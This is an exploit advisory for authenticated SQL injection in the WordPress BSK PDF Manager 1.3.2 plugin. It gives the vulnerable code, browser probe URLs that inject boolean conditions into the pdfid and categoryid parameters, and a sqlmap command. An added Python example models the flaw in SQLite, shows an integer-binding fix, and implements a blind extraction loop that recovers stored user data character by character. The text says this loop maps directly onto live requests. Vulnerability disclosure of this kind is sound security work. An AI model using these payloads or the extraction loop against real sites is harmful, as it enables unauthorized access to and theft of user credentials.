######################
# Exploit Title : WordPress BSK PDF Manager 1.3.2 Authenticated SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://www.bannersky.com/bsk-pdf-manager/
# Software Link : http://downloads.wordpress.org/plugin/bsk-pdf-manager.zip
# Date : 2014-07-04
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap 1.0-dev-5b2ded0
######################
# Location :
bsk-pdf-manager/inc/bsk-pdf-dashboard.php
(reached as a logged-in user through /wp-admin/admin.php?page=bsk-pdf-manager and page=bsk-pdf-manager-pdfs)
######################
# Vulnerable code :
[claudio@localhost ~]$ grep -R GET bsk-pdf-manager/
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['view']) && $_GET['view']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: $categories_curr_view = trim($_GET['view']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['categoryid']) && $_GET['categoryid']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: $category_id = trim($_GET['categoryid']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['view']) && $_GET['view']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: $lists_curr_view = trim($_GET['view']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['pdfid']) && $_GET['pdfid']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: $pdf_id = trim($_GET['pdfid']);
# The two ids are only trim()'d; no integer cast, escaping or $wpdb->prepare() before they reach the query:
$category_id = trim($_GET['categoryid']);
$pdf_id = trim($_GET['pdfid']);
######################
Exploit Code via Browser (authenticated session required; boolean-based blind):
Append a condition to the numeric id and compare with the plain request. "and 1=2" makes the record disappear, "and 1=1" leaves it in place, which only happens if the value is interpolated into SQL. Spaces can be sent as %20 or +.
http://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager-pdfs&view=edit&pdfid=1 and 1=2
http://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1 and 1=2
Exploit Code via sqlmap:
sqlmap --cookie='INSERT_WORDPRESS_COOKIE_HERE' -u "http://10.0.0.67/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1" -p categoryid
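Added worked example (not the plugin's code and not part of the original advisory): an in-memory SQLite model of the `trim($_GET['pdfid'])` concatenation shown in the vulnerable-code section, the one-line fix (cast to integer and bind the parameter, i.e. `absint()` plus `$wpdb->prepare('%d')` in WordPress terms), the two URL-encoded browser probes, and the boolean-based blind extraction loop that sqlmap automates for the `and 1=2` oracle above. The table names, columns and rows are constructed stand-ins, not the real wp_* schema; the string functions are SQLite's (MySQL behind WordPress would use ascii()/substring()).

```python
# Added example, not the plugin's code: models the pdfid injection from
# bsk-pdf-dashboard.php against an in-memory SQLite database.
# Tables, columns and rows are constructed stand-ins, not the real schema.
import sqlite3
from urllib.parse import urlencode


def build_db():
    """Constructed sample data standing in for the wp_* tables (assumption)."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE bsk_pdfs (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
        INSERT INTO bsk_pdfs VALUES (1, 'handbook.pdf'), (2, 'invoice.pdf');
        INSERT INTO users VALUES (1, 'admin', '$P$BexampleHashOnly');
        """
    )
    return db


def vulnerable_lookup(db, pdfid):
    """Mirrors the plugin: trim() on $_GET['pdfid'], then straight concatenation."""
    sql = "SELECT title FROM bsk_pdfs WHERE id = " + pdfid.strip()
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def hardened_lookup(db, pdfid):
    """Fix: coerce to an integer and bind it (absint() + $wpdb->prepare('%d') in
    WordPress). PHP's absint() would keep the leading '1' of '1 and 1=2' where
    Python's int() rejects it; either way no attacker SQL text reaches the query."""
    try:
        pid = abs(int(pdfid.strip()))
    except ValueError:
        return None
    row = db.execute("SELECT title FROM bsk_pdfs WHERE id = ?", (pid,)).fetchone()
    return row[0] if row else None


def probe_urls(base="http://127.0.0.1/wp-admin/admin.php"):
    """The advisory's browser check, URL-encoded: the two responses differ
    (record shown vs. not shown) only if the id is interpolated into SQL."""
    return [
        base + "?" + urlencode({"page": "bsk-pdf-manager-pdfs", "view": "edit", "pdfid": p})
        for p in ("1 and 1=1", "1 and 1=2")
    ]


def oracle(db, condition):
    """Boolean oracle: PDF 1 comes back only when the injected condition holds."""
    return vulnerable_lookup(db, "1 and (" + condition + ")") is not None


def extract(db, expr, max_len=64):
    """Recover the string a scalar subquery `expr` evaluates to, one character
    per ~7 oracle calls by binary search on its code point."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # past the end substr() is '' and unicode('') is NULL, hence coalesce
            if oracle(db, f"coalesce(unicode(substr({expr},{pos},1)),0) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = build_db()
    print(probe_urls())
    print(vulnerable_lookup(db, "1 and 1=1"), vulnerable_lookup(db, "1 and 1=2"))
    print(hardened_lookup(db, "1 and 1=2"))
    print(extract(db, "(SELECT user_login FROM users WHERE id=1)"))
```

Against the real target each `oracle()` call is one authenticated GET to admin.php and the "row present" signal is whether the edit form for PDF 1 is rendered; sqlmap's `-p categoryid` does the same comparison and the same per-character search.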
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
info@homelab.it
#####################
//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc. nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information